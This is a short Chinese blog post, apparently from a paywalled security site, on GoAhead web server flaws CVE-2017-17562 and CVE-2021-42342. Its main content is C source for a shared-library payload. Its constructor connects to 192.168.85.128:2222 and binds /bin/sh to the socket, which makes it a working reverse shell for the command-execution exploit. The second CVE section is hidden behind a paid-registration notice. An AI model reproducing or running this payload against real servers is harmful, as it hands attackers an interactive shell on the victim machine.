Close

30 6 月, 2024

(CVE-2017-17562)(CVE-2021-42342)

GoAhead 远程命令执行漏洞(CVE-2017-17562)

#include <unistd.h> 
#include <stdlib.h> 
#include <sys/socket.h> 
#include <netinet/in.h>
static void before_main(void) __attribute__((constructor));
static void before_main(void){ int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in attacker_addr = {0}; attacker_addr.sin_family = AF_INET;
attacker_addr.sin_port = htons(2222);
attacker_addr.sin_addr.s_addr = inet_addr("192.168.85.128");
if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0) exit(0); 
dup2(sock, 0); dup2(sock, 1); dup2(sock, 2); execve("/bin/sh", 0, 0); }

GoAhead Server 环境变量注入(CVE-2021-42342)  

您没有 权限 查看此处内容!

您需要 才能查看所有内容 ,注册请联系客服, 请点这里帮助注册,注册费180